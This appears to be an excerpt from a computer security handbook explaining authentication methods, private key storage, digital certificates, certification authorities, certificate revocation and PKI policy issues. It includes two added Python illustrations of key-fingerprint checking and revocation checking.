• Passwords must be distributed to users. Some systems use default passwords so that the user can set a password at first login, but defaults are usually left untouched, and the first user to log in may not be the authorized user.
• When passwords are sent to a remote computer, they may be stolen along the way. Encryption can reduce this risk, but if someone enters a PIN at an ATM and another person watches over their shoulder, there is no way to encrypt that number so that the onlooker cannot read it.

• Good passwords are easy to forget, which leads people to write them down, to use the same password for many applications, to choose simpler passwords, or to use poor passwords that are easy to guess.

• Passwords can be shared, which may allow unauthorized people to use resources that they should not.

Physical tokens: something you have

Another way for people to prove their identity is with tokens: physical objects whose possession in some way proves identity. Door keys have been used for centuries as physical access tokens; in many modern buildings, metal keys have been supplemented by magnetic or radio-frequency card systems. Card access systems are preferable to metal key systems because each card can carry a unique number that is assigned to an identity. In practice the system holds a list of authorized cards and opens different doors accordingly. Time restrictions can also be attached to these cards so that, for example, a junior secretary's card cannot be used for access outside office hours.
Token-based systems are, in effect, self-policing: because users need their cards to get at their accounts, they quickly report cards that are lost or stolen, and once a card is registered in the system as "lost" it is usually deactivated and a new card is simply issued to its holder. This is an improvement over keypad-based systems, in which people can share their PINs with others without losing their own access.

As with passwords, token-based systems have their problems:

• Tokens do not really prove who you are. Anyone who has physical possession of a token can gain access to the restricted area;

• Someone who loses a token can no longer enter the restricted area, even though that person's identity has not changed; and

• Some tokens are easily copied or forged.

Token-based systems do not really identify and authenticate people; they authenticate tokens. This becomes a particular problem when a token is stolen. For this reason, in high-security applications the token system is usually combined with some other means of identification, an arrangement usually referred to as "two-factor authentication." For example, to gain access to a room or a computer you may have to present a token and also enter an authentication code. This is the technique that automatic teller machines use to identify the holders of bank accounts.

Biometrics: something you are

The third technique, which computers are using more and more to determine people's identity, is to take a physical measurement of the person and compare it with information recorded from that person earlier. This technique is called biometrics, because it is based on measuring something about a living person. Biometrics come in many kinds, such as images of the face, the retina, the iris, fingerprints, hand geometry, voice prints, handwriting, typing characteristics, or DNA patterns.

Biometric techniques can be used both for "ongoing identification" and for "absolute identification." Using them for ongoing identification is the simpler case: the first time the user enters the system, the user's biometric information is recorded. At later logins, the new biometric is compared with what was recorded before. Using biometrics for absolute identification requires building a large database that matches names with biometrics. In the United States, the Federal Bureau of Investigation (FBI) has such databases, one matching names with fingerprints and another with DNA material.

Compared with passwords and access tokens, biometrics have two clear advantages. They cannot be forgotten or lost, and they cannot easily be shared, copied, or stolen. But moving biometric technology from the laboratory to the marketplace is difficult. Every biometric system has a certain level of false positives, in which the system declares a match that it should not. Likewise there are false negatives, in which the system declares that two biometrics come from different people when in fact they come from the same person. To reduce the chance of false matches, some biometric systems combine the biometric with a password or token. With passwords, the user is usually asked to type a secret identification code such as a PIN and then to provide a biometric sample, such as a voice print. The system uses the identification code to retrieve a stored profile and then compares the biometric with the stored template. In this way the system has to compare the biometric presented against only one of the stored values, rather than against the entire database.
Biometrics are not exact, because:

• Before a person can be identified, that person's biometric characteristics must already be in the computer's database;

• If the database of biometric records is compromised, biometric identification becomes worthless; and

• Unless the measuring equipment is specially protected, it is vulnerable to fraud and tampering. For example, a clever thief faced with a voice-based identification system might be able to fool it by recording the voice of an authorized person (as that person speaks the passphrase), rewinding the tape, and then playing the recording back.

Location: someplace where you are

As computer systems have developed to the point where they can readily determine where their users are, it has become possible to deploy location-based authentication systems. Although the Global Positioning System (GPS) can be used to obtain location information, there are two serious obstacles to using GPS for this purpose: first, GPS usually does not work indoors; second, there is no way to pass the location information securely from the GPS receiver to the remote service that has to verify it. A better choice for location-based authentication is to use the location-based services offered by some mobile telephone networks. With these systems the network can determine the user's location and then report that information directly to the service, without concern that the information could be tampered with while the user is being authenticated.

A simple form of location-based authentication is to have a particular computer or terminal that is authorized to perform a specific function. People in other locations are denied such privileges. To date, "location" has not been used as a general-purpose system for authentication.
Using public keys for identification

The identification and authentication techniques described so far all share one flaw: to identify a person reliably, that person must be in the presence of the computer or the person performing the identification. If the person is not present (if identification takes place by telephone, by fax, or over the Internet), the possibility of "replay attacks" makes the likelihood of fraud and abuse very high.

Imagine a situation in which one computer captures a user's fingerprint and another computer performs the verification. In that case an attacker can steal the digital code of the fingerprint as it crosses the network. Once the attacker has the fingerprint transmission, it can be used to impersonate the victim. As noted, replay attacks are at present a serious threat to digital identification systems.

As we have said, public key cryptography can reduce the risk of such attacks. When public key systems are used for identification, the private key is used to create a signature and the public key is used to verify it. Because the private key never leaves the possession of the person being identified, and so is never sent over the wire, an attacker has no opportunity to steal the private key and use it for malicious purposes.

Public key cryptography can be used for authentication both online and offline. In offline authentication, the user creates a digitally signed message whose validity can be checked at some later time. In online authentication, the user is authenticated in real time by a remote server. The remote server sends a randomly generated challenge to the user's computer, and the user's computer digitally signs it with the user's private key and returns it. Alternatively, the remote server encrypts the challenge with the user's public key and sends the encrypted challenge to the user, who proves their identity by decrypting it and sending it back encrypted with the server's public key. Because of the challenge-response protocol, online systems are generally more secure than offline systems.

Control and management of private keys

When a digital signature is used to prove a person's identity, what actually takes place is not exactly proof of identity. Being able to produce a valid signature does not prove that you are a particular person; it shows only that you are in possession of a particular private key. That is why keys belonging to "Hillary Clinton" and "Batman" can be found on public key servers.

For verification of a digital signature to become authentication, several preconditions must be met:

1. Each public key/private key pair must be used by only one person.

2. The private key must be stored securely. Otherwise it may be misused, stolen, and used fraudulently by others.

3. A trust mechanism is needed, so that the person verifying the identity can be confident that the name on the key really is the correct name of the key's current owner.

If keys are generated carelessly, an attacker may be able to compute the private key from the corresponding public key. If keys are not stored properly, an attacker may be able to steal the private key with ease.

Although these rules look simple at first glance, implementing them correctly is very difficult. Worse, it is usually very hard to evaluate one company's public key system and determine whether or not it is more secure than another.
There are several different ways to generate and store keys. Roughly in order of decreasing security, they are as follows:

1. Use a cryptographic coprocessor such as a smart card. A smart card that supports public key cryptography contains a microprocessor, a hardware random number generator, and functions for the basic public key algorithms, together with memory that can hold keys and public key certificates. In theory, the private key never leaves the card. To sign or decrypt a piece of information, you transfer that information to the card, and the signed or decrypted result is then transferred off the card. Attackers therefore cannot use the private key unless they gain possession of the smart card itself. Passwords, PINs, fingerprint readers, or other biometric devices can be added to smart cards so that the card creates a signature only when the card has authenticated its holder.

Smart cards are not without flaws, however, and in some respects they are quite fragile. If a card is lost, stolen, or damaged, the keys on it are gone and are no longer available to the user. So if the keys on a card are to be used over a long period to encrypt information, some system for duplicating the card may be wanted, to keep the key from becoming unusable. If the keys are used only for digital signatures, though, none of this is necessary. If a signing key is lost, it is enough to create a new signing key, and no information is lost in the process. Smart cards are not completely secure against tampering. Cryptographic smart cards run small operating systems, and flaws in those operating systems can lead to compromise of the key. It is also possible to analyze a card physically and recover the keys on it. Even so, smart cards are at present the most secure way to store private keys.
2. Generate the keys on a desktop computer and then store the encrypted keys on a floppy disk or flash memory. When the key is needed, the user inserts the floppy disk into the computer's drive; the computer reads the encrypted private key into memory, decrypts the key, and finally uses it to sign the requested information. This technique is less secure than a smart card, because the private key has to be brought into the computer's memory, where it may be attacked by computer viruses, Trojan horses, or other malicious programs.

3. Generate the key inside the computer, encrypt it with a passphrase, and store it in a file on the computer's hard disk. This is the technique that programs such as PGP and Netscape Navigator use to protect private keys. It is a convenient technique, but its weakness is that anyone who gains access to your computer and knows your passphrase can get at your private key. And because the key must be decrypted by the computer before it can be used, it is vulnerable to attacks on the computer's memory by malicious programs or Trojan horses.

4. The least secure way to generate a private key/public key pair is to ask someone else to do it for you and then to collect your public and private keys from that person. The basic problem with this approach is that the private key is compromised by definition, because someone else has a copy of it. Despite this, some organizations (and some governments) require people to use keys supplied by a third party, so that the organization holds a copy of every user's key and can decrypt all electronic mail sent to individuals. In practice, most cryptographic systems use the third option: generating a key on a desktop computer and then storing it on the computer's hard disk.
Digital certificates

Digital certificates and a public key infrastructure (PKI) are attempts to tie identities to digital signatures. A digital certificate is a special kind of digital signature: a digital signature that is accompanied by an identity and is designed so that computers can interpret it automatically. A PKI is a collection of technologies and policies for creating and using digital certificates. The effectiveness of these systems depends on three things coming together at once: carefully written public key cryptography, policies that are carried out and maintained precisely, and a legal system that guarantees that the policies are properly enforced. PKI is discussed in detail later in this chapter.

The problem of digital identification with public keys is a deep philosophical one. How can you be sure that a public key belongs to the person or organization whose name is on the key? How can one be certain about something that is uncertain? Because specific rules and procedures are followed in creating and protecting these statements, in practice we can know something about the identity of key holders and the validity of digital certificates.

There are three main ways to be sure that a public key really belongs to the person who claims to own it:

1. Get the public key directly from the person and verify it in a way that leaves you completely sure of it.

2. Be sure that another person whom you trust has verified the key.

3. Be sure that a reputable, trusted authority has certified the key.

Verifying a key personally

One way to be sure that you have Jean Trocard's public key is to meet Jean, ask Jean to read the key aloud, and compare it digit by digit with the key you have. If you know Jean well and also trust the telephone system, you can make this comparison by telephone, but not over the Internet, where someone may be able to intercept the comparison and replace the digits with those of a forged key.

Because public keys are made up of very long numbers, comparing them digit by digit is not an attractive task. Instead, you and Jean can each compute a cryptographic message digest of the key and compare the characters of the two digests. These digests are usually called "key fingerprints." Some users of public key cryptography print their key fingerprints on their business cards, so if you received the business card directly from Jean, you can later download Jean's public key and verify it.

Certifying other people's keys

Once you have established that Jean's key really does belong to Jean, you may be willing to accept other public keys that Jean vouches for. Jean can vouch for other people's keys by signing them with Jean's own key, and when you receive a key signed by Jean's key you can be sure that Jean signed it, because you know that Jean's key is valid and you have assumed that only Jean has access to it.

Accepting the keys that Jean vouches for does not rest on the validity of Jean's key; it rests on how far you trust Jean to be careful about the keys that Jean signs. In most public key systems these two ideas, the validity of a key and your trust in its owner, are independent of each other. In some systems you can wait for confirmation from two or more trusted parties before accepting any key as valid.

PGP users commonly hold key signing parties at which they check one another's keys and sign them. A public key at such a gathering may collect ten or more signatures, which someone can later use to assess the validity of that key. PGP users usually distribute their keys through PGP key servers around the world, so when you download a key from a key server you can use the signatures on it to decide whether you are convinced that the key really represents the person who claims to own it.
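The business-card check described under "Verifying a key personally" can be written down as follows. This is an added example, not part of the handbook: it assumes the fingerprint is the SHA-256 digest of the decoded body of a PEM-armoured key, whereas PGP and SSH each define their own fingerprint encodings, and the "keys" are constructed byte strings rather than real key material.

```python
"""Checking a downloaded key against a printed fingerprint (added illustration)."""
import base64
import hashlib
import re

PEM_BLOCK = re.compile(r"-----BEGIN ([A-Z ]+)-----(.*?)-----END \1-----", re.S)


def to_pem(raw, label="PUBLIC KEY"):
    """Wrap raw bytes in PEM armour (used here only to build constructed samples)."""
    body = base64.encodebytes(raw).decode("ascii")
    return f"-----BEGIN {label}-----\n{body}-----END {label}-----\n"


def der_from_pem(pem_text):
    """Strip the PEM armour and return the decoded body."""
    match = PEM_BLOCK.search(pem_text)
    if match is None:
        raise ValueError("no PEM block found")
    return base64.b64decode("".join(match.group(2).split()), validate=True)


def fingerprint(key_bytes):
    """Digest of the key; both parties must hash exactly the same bytes."""
    return hashlib.sha256(key_bytes).hexdigest()


def display(fp, group=4):
    """Format a fingerprint the way it might be printed on a card."""
    return " ".join(fp[i:i + group] for i in range(0, len(fp), group)).upper()


def normalise(printed):
    """Accept spaces, colons and either letter case; reject anything incomplete."""
    cleaned = re.sub(r"[\s:]", "", printed).lower()
    if not re.fullmatch(r"[0-9a-f]{64}", cleaned):
        raise ValueError("expected 64 hexadecimal digits")
    return cleaned


def matches_card(downloaded_pem, printed):
    """True only if the downloaded key hashes to the fingerprint received in person."""
    return fingerprint(der_from_pem(downloaded_pem)) == normalise(printed)


def demo():
    # Constructed stand-ins for key material; not real public keys.
    jean_key = b"constructed public key bytes: Jean"
    forged_key = b"constructed public key bytes: attacker"
    card = display(fingerprint(jean_key))  # handed over in person
    return {
        "genuine download": matches_card(to_pem(jean_key), card),
        "substituted download": matches_card(to_pem(forged_key), card),
    }


if __name__ == "__main__":
    print(demo())
```

The fingerprint is only as trustworthy as the channel it arrived by; the comparison detects a substituted key only if the printed value did not travel alongside the download.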
Certification authorities: third-party registrars

Although "signing parties" are a good way for individuals to build trust, experience has shown that they are not a practical way to build a national database of cross-certified public keys, because the coverage is usually far too thin. Some people do not have the time to go to signing parties. Moreover, having someone's signature on a person's key shows only that the two people know each other, or at least have met. For this reason, in most cases the widespread use of public key cryptography ends up with a tree of certificates that has a certification authority (CA) at its root. A "certification authority" is a person or organization that issues digital certificates.

A certification authority can set standards that must be met before it signs a key. For example, a university might verify that the key it is about to sign really belongs to a bona fide student. Another certification authority might have no standards at all. The world's largest certification authority, VeriSign, issues several different kinds of certificates. Under the VeriSign Trusted Network (VTN) it issues certificates for use by the general public. The company also issues certificates for use within corporations. The lowest level of certificates issued by VTN provides no assurance at all, but the highest levels assure that VTN identified the key holder before issuing the certificate.
Certificates signed by certification authorities are like cryptographically signed identity documents. They contain the user's identifying information, signed with the certification authority's own private key, and they also include information such as the name of the authority, the authority's public key, and a serial number. To date, most certificates issued by certification authorities are certificates vouching that a particular public key belongs to a particular person or organization. Certificates can also be used to attest to other facts, as in the university example mentioned earlier. The services of a certification authority can be used in several different ways:

Internal certification authority

An organization can use a certification authority to certify its own employees. Certificates issued by an internal certification authority can state a person's name, position, and level of authority. These certificates can be used inside the organization to control access to internal resources and the flow of information. The internal certification authority can serve as the foundation of the organization's public key infrastructure.

Companies can also use an internal certification authority that issues certificates to customers. For example, several stock exchanges have required their customers to obtain the necessary certificates before being allowed to carry out high-value trades over the Internet.

Outsourced certification authority

An organization may want to share in the benefits of digital certificates but lack the technical ability to set up the service. Such an organization can contract with an outside organization to provide certification services for its employees and customers, just as a company contracts with a photo lab to produce identification cards.
Trusted third-party certification authority

A company or government agency can use a third-party certification authority to bind public keys to the legal names of individuals and companies. Such an authority can allow people with no prior relationship to authenticate themselves to one another and to engage in legal transactions. Certificates issued by a worldwide certification authority can be the equivalent of the driver's licenses and identity cards issued by a government.

To use the certificates issued by a certification authority, you must have a copy of that authority's public key. Public keys are distributed in certificates of their own. At present most of these certificates come pre-installed in web browsers and operating systems. The public keys of certification authorities can also be added manually by the end user.

Clearly, certification authorities whose keys are not pre-installed in web browsers or operating systems are at a disadvantage. Although Microsoft and Netscape now open their browsers to any certification authority that can meet their certification requirements, the original web browsers were distributed with a small number of carefully chosen CA keys. Having these keys placed in those programs was a great advantage for the certification authorities that issued them and a barrier for everyone else.

Certification Practices Statement (CPS)

The Certification Practices Statement (CPS) is a legal document that a certification authority publishes and that describes the policies and procedures for issuing and revoking digital certificates. A certification authority's CPS makes clear what it means for a key to be certified by that authority.

CPS documents are designed to be read by people, not by machines. A business may wish to accept certificates from a certification authority that guarantees minimum certification policies and accepts a defined level of liability if the certification policies are not followed, and it may also want the certification authority to be guaranteed by a reputable organization.
X.509 v3 certificates

Although CAs can issue any kind of certificate, in practice most of them issue certificates that conform to the X.509 v3 standard. Likewise, most cryptographic programs and protocols, including SSL, are designed to use only X.509 v3 certificates. The one notable exception is PGP, which uses its own certificate format, although recent versions also support some X.509 certificates. (SSH does not use certificates; instead it relies on users verifying keys personally.)

Every X.509 certificate contains a version number, a serial number, identifying information, algorithm-related information, and the signature of the issuing CA. The industry adopted X.509 v3 certificates rather than the original X.509 certificates because the X.509 v3 standard allowed arbitrary name/value pairs to be included in the standard certificate. These pairs can be used for many purposes, and they allow the use of certificates to grow without changes to the underlying protocol.

Types of certificates

Four types of digital certificates are in use on the Internet today:

Certification authority certificates

These certificates contain the public key and the name of the CA, or the name of the particular service being certified. They are usually "self-signed", that is, signed with the CA's own private key. CAs can also certify one another in a chain, or sign each other's keys. What such chained certificates actually mean is still an open question. Microsoft Windows, Microsoft Internet Explorer, Netscape Navigator, and OpenSSL are all distributed with more than ten certificates from various CAs.

In the list of CAs distributed with web browsers, many companies have more than one certificate. VeriSign has the most, with more than 20 different certificates. Signatures made with different private keys denote different levels of trust and validity.
Server certificates

These certificates contain the public key of an SSL server, the name of the organization that runs the server, and the server's DNS name. Every encryption-capable server on the Internet must have a server certificate for the SSL protocol in order to work properly. Although the original purpose of these certificates was to help clients identify web servers and to prevent man-in-the-middle attacks, in practice server certificates are used more for encryption than for authenticating the server.

Personal certificates

These certificates contain a person's name and public key. They can also include other information, such as the person's e-mail address, postal address, and date of birth. They are issued by organizations to their employees or customers. Personal certificates are inherently a more secure way for people to identify themselves on the Internet than a user name and password. They are also required for users of the S/MIME e-mail encryption protocol.

Software publisher certificates

These certificates are used to verify the signatures on distributed software, such as ActiveX components and executables downloaded from the Internet. Each recent version of Windows has shipped with a number of software publisher certificates, each of which can be used to verify the signatures on Windows applications.

Minimal disclosure certificates

Digital certificates carry a threat to the privacy of their users. When you present a certificate to a server, the server can easily record all of the identity information on the certificate, whether or not the server needs it for authentication. In many cases an organization that obtains this information in the course of business is free to do whatever it likes with it.
One way to minimize the privacy threat is to use minimal disclosure certificates. These certificates let their holders selectively reveal specific parts of the certificate without disclosing the rest. For example, a woman who wants to log in to the web site of a cancer victims' group could use a minimal disclosure certificate to prove to the site that she is a woman over 21 who has breast cancer, without revealing her name or address. The concept of minimal disclosure certificates was invented by a mathematician named Stefan Brands, and in February 2000 it was licensed exclusively to the Canadian company Zero Knowledge Systems [141].

[141] http://www.wired.com/news/technology/0,1282,34496,00.html

Revocation

In addition to issuing certificates, a CA must be able to revoke a certificate if it learns that it has made a mistake or that the private key has been misused. A certificate must also be revoked when a subscriber's validity period comes to an end.

The need for a practical revocation mechanism became fully clear in March 2001, when Microsoft announced that in January VeriSign had issued two certificates to an individual who falsely claimed to be a Microsoft employee; the company name recorded in both certificates was Microsoft. Microsoft noted that "the ability to sign executable files using keys that purport to belong to Microsoft could be of great benefit to attackers who want to persuade users to allow those files to run." [142]

Certificate revocation lists

One approach to revocation is to publish a certificate revocation list (CRL). A CRL is a list of all the certificates that have been revoked by the CA and that, for whatever reason, have not yet expired. Ideally, every CA publishes a CRL at regular intervals. Besides listing the revoked certificates, a CRL states how long it remains valid and how to obtain the next CRL.
At present, X.509 v3 certificates are supposed to contain a field called the CRL distribution point (CDP). In theory, a program that wants to verify the validity of a certificate should be able to fetch a CRL from the corresponding CDP to determine whether the certificate has been revoked. Because most certificates are issued by a small number of CAs, it is reasonable to assume that a program could download a fresh CRL every day or every hour and then keep the list in memory for subsequent lookups. An organization with limited Internet connectivity could download the CRL once and distribute it among its users.

In practice, CRLs and CDPs have several problems:

• If the CA is very popular, its CRLs are likely to be very large. Downloading a CRL of, say, 900 kilobytes over a dial-up connection to the VeriSign CA's SSL server can take more than 20 minutes;
• Between the time a certificate is revoked and the time the new CRL is distributed there is a window during which the certificate appears to be valid although it is not; and
• Many programs do not implement CRLs and CDPs correctly.

In the case of the fraudulently issued Microsoft certificates mentioned earlier, the bogus certificates were revoked and listed in VeriSign's CRL, but unfortunately the certificates that VeriSign had issued did not contain valid CDPs. (According to VeriSign, because of a bug in the Authenticode implementation distributed with Internet Explorer 3.02, Authenticode certificates do not contain CDPs.)

Without a CDP, a program that tried to verify the validity of the fraudulently issued certificate would not know where to obtain the CRL in which the revoked certificates were listed. [145]

Real-time certificate validation

An alternative to CRLs is to validate certificates in real time. Every time a certificate needs to be validated, the CA is consulted online. Real-time validation systems solve the CRL problem well, although they require a reliable and trustworthy network.
[142] http://www.microsoft.com/technet/security/bulletin/MS01-017.asp
[145] In the end, Microsoft had to issue an operating system patch to resolve the problem. The fix contained an additional CDP, which made Internet Explorer consult a local CRL when validating certificates, together with a CRL that listed the two certificates mistakenly issued by VeriSign.

The first problem with real-time certificate validation systems is scale. As certificates gain more and more users, the validation servers must become faster and faster in order to serve the growing user community. In addition, real-time systems are vulnerable to denial-of-service attacks. If a business cannot reach the revocation server, how should it treat a certificate? Should it trust the certificate, or refuse to give it any credit? If the default is to trust, an attacker can flood the revocation server with a very large number of bogus requests and knock it out of service at the moment an invalid certificate is being used. If the default is to distrust, an attacker can use denial-of-service attacks to make the revocation server unavailable, so that all transactions are rejected and the company's reputation is quickly damaged.

Public key infrastructure

Public key infrastructure (PKI) comprises the system of digital certificates, the CAs, the tools, the systems, and the hardware that are used to deploy public key technology.

The vision of many early PKI advocates was a centralized system to be implemented by governments, so that digital certificates, like birth certificates and passports, would be endorsed by governments. That vision was worth examining, but whatever its merits, it has not been implemented to date.
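The revocation trade-offs described above (the CRL validity period and the window before the next CRL, a certificate with no CDP, and the trust-or-reject default when the validation server cannot be reached) can be made concrete in a short simulation. This is an added example, not code from the handbook; the class names, the CA name, the serial numbers and the URL are constructed for illustration.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from enum import Enum
from typing import Optional


class Status(Enum):
    GOOD = "good"
    REVOKED = "revoked"
    UNKNOWN = "unknown"          # no usable revocation information

@dataclass(frozen=True)
class Crl:
    issuer: str
    this_update: datetime
    next_update: datetime        # a CRL states how long it stays valid
    revoked_serials: frozenset

    def is_fresh(self, now):
        return self.this_update <= now < self.next_update

@dataclass(frozen=True)
class Cert:
    issuer: str
    serial: int
    cdp: Optional[str]           # CRL distribution point; may be missing

class RevocationChecker:
    """Online status first, cached CRL as fallback, explicit default last."""

    def __init__(self, fetch_crl, online_status=None, fail_closed=True):
        self.fetch_crl = fetch_crl          # callable(url) -> Crl, OSError on failure
        self.online_status = online_status  # callable(cert) -> Status, OSError on failure
        self.fail_closed = fail_closed
        self.cache = {}

    def _crl_status(self, cert, now):
        if cert.cdp is None:
            return Status.UNKNOWN, "certificate carries no CDP"
        crl = self.cache.get(cert.cdp)
        if crl is None or not crl.is_fresh(now):
            try:
                crl = self.fetch_crl(cert.cdp)
            except OSError as exc:
                return Status.UNKNOWN, f"CRL fetch failed: {exc}"
            if crl.issuer != cert.issuer or not crl.is_fresh(now):
                return Status.UNKNOWN, "fetched CRL is stale or from another issuer"
            self.cache[cert.cdp] = crl
        if cert.serial in crl.revoked_serials:
            return Status.REVOKED, "serial listed in CRL"
        return Status.GOOD, f"not in CRL issued {crl.this_update:%Y-%m-%d %H:%M}"

    def check(self, cert, now):
        """Return (accept, status_name, reason)."""
        status, reason = Status.UNKNOWN, "no online responder configured"
        if self.online_status is not None:
            try:
                status, reason = self.online_status(cert), "online responder"
            except OSError as exc:
                status, reason = Status.UNKNOWN, f"responder unreachable: {exc}"
        if status is Status.UNKNOWN:
            status, reason = self._crl_status(cert, now)
        if status is Status.UNKNOWN:
            accept = not self.fail_closed    # the trust-or-reject default
            reason += "; rejected by default" if self.fail_closed else "; accepted by default"
        else:
            accept = status is Status.GOOD
        return accept, status.name, reason

def run_constructed_scenarios():
    """Constructed data only: one CA, one CDP URL, two certificates."""
    t0 = datetime(2001, 3, 1)
    day = timedelta(hours=24)
    url = "http://crl.example.test/ca.crl"
    published = {url: Crl("Example CA", t0, t0 + day, frozenset())}

    def fetch(u):
        if u not in published:
            raise OSError("no such distribution point")
        return published[u]

    def responder_down(cert):
        raise OSError("connection timed out")

    cert = Cert("Example CA", 1001, url)
    no_cdp = Cert("Example CA", 1002, None)
    crl_only = RevocationChecker(fetch)
    out = {"before_revocation": crl_only.check(cert, t0 + timedelta(hours=1))[0]}
    # The CA revokes serial 1001 at t0+2h, but clients see it only in the next CRL.
    out["inside_window"] = crl_only.check(cert, t0 + timedelta(hours=3))[0]
    published[url] = Crl("Example CA", t0 + day, t0 + 2 * day, frozenset({1001}))
    out["after_next_crl"] = crl_only.check(cert, t0 + day + timedelta(hours=1))[0]
    closed = RevocationChecker(fetch, responder_down, fail_closed=True)
    opened = RevocationChecker(fetch, responder_down, fail_closed=False)
    out["no_cdp_fail_closed"] = closed.check(no_cdp, t0)[:2]
    out["no_cdp_fail_open"] = opened.check(no_cdp, t0)[:2]
    return out
```

The "inside_window" result is the exposure the text warns about: the cached CRL is still within its validity period, so the revoked certificate is accepted until the next CRL is fetched.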
Companies such as VeriSign have issued millions of certificates that establish the identities of individuals and organizations, and the keys used to sign these certificates have been distributed on a wide scale. Some of these trust hierarchies, such as the one used to validate web server certificates, are now used by more than a hundred million people, but they are run by private businesses, not by government. The word "public" in PKI likewise refers to the public keys used in these certificates, not to the public at large.

Problems with today's CAs

Regrettably, if you look closely at the root certificates built into Internet Explorer and Netscape Navigator, you will find major inconsistencies and quality-control problems among today's CAs.

Short-lived availability of Certification Practices Statements

Unfortunately, many CA certificates refer to CPSs that are no longer accessible. For example, the self-signed certificate of Autoridad Certificadora del Colegio Nacional de Correduria Publica Mexicana, A.C., distributed with Internet Explorer 5.0, is valid from June 1999 to June 2009. The certificate claims that its CPS is available at http://www.correduriapublica.org.mx/RCD/dpc, yet this URL was not accessible at least as of April 2001.

It is very important for a CA to maintain every URL that appears in each of the certificates it has issued. If a CA changes its CPS, each CPS should then be available from a unique URL. These links must remain accessible for the entire validity period of every certificate that refers to that CPS, because the legal meaning of a certificate cannot be determined without reading the CPS. Moreover, because the meaning of a signature may be called into question several years after it was made, the URLs should as a rule remain active for at least 20 years.
Inconsistencies in certificate fields

The certificates built into Netscape Navigator and Internet Explorer are meant to serve as the foundation of the world's electronic commerce infrastructure and of legally binding agreements. What complicates this goal is the fact that different organizations use the certificate fields in widely varying ways. More precisely, the "Subject" field, which identifies the issuer by its Distinguished Name, has no standard format, and the certificate of a different CA may contain completely different distinguishing attributes. If a certificate is to be processed by software in an automated procedure, binding rules for the use of the Distinguished Name and the other fields are essential. Without such rules, certificates would have to be inspected visually by people trained to recognize every conceivable type and format of legitimate name, in order to tell valid certificates from invalid ones.

Unrealistic expiration dates

Early versions of the Netscape Navigator browser were distributed with certificates whose expiration dates fell between December 25 and December 31, 1999. These products remained in use longer than had been expected. At the end of 1999, many of the products that carried the old certificates stopped working. Although it should have been possible simply to download new certificates, because of other security problems in these early products users were advised to upgrade the whole application. Many users were unhappy that software they depended on had suddenly stopped working.
After this experience, many CAs made a decision that led them to err in the opposite direction: they began distributing certificates with very long expiration times. All of the certificates distributed with Internet Explorer 5.0 are 1024-bit RSA certificates, yet more than half of them have expiration dates after January 1, 2019. VeriSign has also distributed eight certificates with an expiration date of 2028 with Internet Explorer 5.5. Many cryptographers believe that 1024-bit RSA will no longer be considered a secure cryptosystem by that date.

PKI policy issues

The need for a widespread public key infrastructure is unavoidable. The number of fraud incidents on the Internet is rising, and the need to use digital signatures for commerce is growing. Nevertheless, a widespread PKI seems further away today than it did in the mid-1990s.

That private keys and digital certificates should be used to prove identity is a thoroughly established idea among computer security experts. Yet when the digital signature at the bottom of an e-mail message fails to verify, these same experts call one another on the telephone to make sure, and the only reason is that the technology, for all its apparent simplicity, runs into unwanted and unforeseeable problems.

A few of the problems that must be dealt with in building a real PKI are described below.

Private keys are not people

Digital signatures make it easier to prove identity, but they are not in themselves proof of identity. Unless the private key is generated randomly and stored in such a way that only one person can use it, the whole process is called into question.
Unfortunately, both the generation and the storage of the key depend on the security of the end user's computer, and we know that most of the computers that run Netscape Navigator or Internet Explorer are not secure. Many of these computers run software downloaded from the Internet without adequate knowledge of its source. Some of these computers are infected with viruses, some downloaded programs contain preinstalled Trojan horses, and the popular operating systems and browsers have serious flaws, with hundreds of security patches issued for them over the past years. It is therefore possible that a network-connected system has recently been compromised by unknown parties. Widespread use of smart cards and card readers may make it harder to steal people's private keys, but it does not make it impossible.

Distinguished names are not people

Protecting private keys is not enough to establish trust in a PKI. How do you determine that the name in the "Distinguished Name" field is actually correct? Every CA promises to follow its stated certification policies when it certifies someone's digital signature. How do you know that the CA's policies ensure that the distinguished name on a certificate really belongs to the person they think it belongs to?

How do you evaluate the trustworthiness of a CA? Should CAs be private companies, or the opposite? It is known that governments have issued false passports when it suited their interests. Could a CA likewise violate its own policies and issue fraudulent digital identity documents? And how do you compare one CA with another? To reassure their customers, some CAs obtain third-party certifications such as SAS 70 [147] (a service auditor report) or WebTrust for Certification Authorities [149] (an attestation report).
The American Bar Association Information Security Committee has published a book called PKI Assessment Guidelines, but few users have the skill or the means to evaluate the CAs that follow these guidelines.

In theory, many of these questions could be resolved by creating standards, audits, and formal accreditation systems. Regulation could also be used to create standards; in practice, however, the efforts made so far are not very encouraging.

[147] Statement on Auditing Standards (SAS) No. 70, which concerns service organizations, is an international standard developed by the American Institute of Certified Public Accountants (AICPA). A SAS 70 assessment confirms that a service organization has had its control objectives and control activities evaluated and attested by an independent accounting and auditing firm.
[149] Under WebTrust certification for networks, a qualified and independent auditor uses a set of accepted principles to determine whether an operating CA meets the minimum requirements for disclosure, policy, practices, and control procedures.

There are too many Robert Smiths
What do you do with a certificate that says it belongs to "Robert Smith"? How do you know which Robert Smith it belongs to? Clearly a certificate must contain more information about a person than just a name; it must contain enough information to identify the person legally and uniquely. Even so, you (the person who wants to rely on Robert Smith's certificate) may not know this additional information, so for you there are still too many Robert Smiths. Of course, if digital certificates had fields for a person's age, sex, or photograph, Internet users would say that disclosing these identifiers without the user's consent violates their privacy, and they might well be right. Preventing this problem is the main strength of an identity card: removing anonymity while preserving privacy, and thereby establishing identity and accountability.

Digital certificates make data aggregation easy

Over the past two decades, universal identifiers such as the U.S. Social Security number have become tools for the systematic violation of people's privacy. Universal identifiers can be used to aggregate information from different sources and to build comprehensive dossiers on individuals. Digital certificates issued from a central location could potentially be a far better tool for aggregating information than Social Security numbers, because they remove the greatest weakness of Social Security numbers: inaccurate data. People sometimes deliberately give a wrong Social Security number, and sometimes they mistype it; with digital certificates, people no longer have that option.

Today, when two companies try to match an individual's identifying information, the process usually runs into trouble because the numbers do not match. Digital certificates, by their design, make this process simple. As a result, the likelihood increases that large databases of personal information aggregated from many sources will be built.
How do you lend a key?

Suppose you are sick in the hospital and you ask your friend Carl to go to your office and bring you your e-mail. To do this, you would have to give him your private key. Should you do that? After the job is done, should you revoke your key? Suppose a user has a problem with a piece of software: he runs into the problem when he uses private key A, but not when he uses private key B. Should he be legally allowed to give a copy of private key A to the software's developers so that they can find out what is wrong with the program? Or would he endanger the integrity of the public key infrastructure by doing so?

